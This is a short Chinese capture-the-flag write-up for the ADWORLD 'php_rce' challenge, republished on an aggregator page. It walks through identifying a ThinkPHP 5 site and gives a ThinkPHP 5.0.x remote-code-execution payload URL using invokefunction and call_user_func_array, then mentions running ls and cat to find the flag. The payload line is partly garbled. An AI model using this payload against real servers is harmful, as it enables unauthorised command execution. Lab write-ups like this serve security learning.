zoukankan      html  css  js  c++  java

  • ADWORLD web/php_rce

    进入链接:

     thinkphp v5是一个php框架,在github 上搜索,得到如下版本

     随便选一个输入到url中,连接返回:

     说明版本是5.0.2,根据5.0.21版本构造payload,得到如下

    /?s=index/	hinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=id

     继续,ls查看目录,无异常

     继续,访问上级目录,在第三层发现flag的身影:

     用cat访问flag

    https://blog.csdn.net/phpergod/article/details/92841998

    https://blog.csdn.net/Mr_helloword/article/details/107924218
  • 相关阅读:
    USB
    Google
    机型参数
    mac
    反编译
    xcode
    Ios 消息推送
    真机:特殊
    Android
    object-c
  • 原文地址:https://www.cnblogs.com/elegantcloud/p/13782406.html
Copyright © 2011-2022 走看看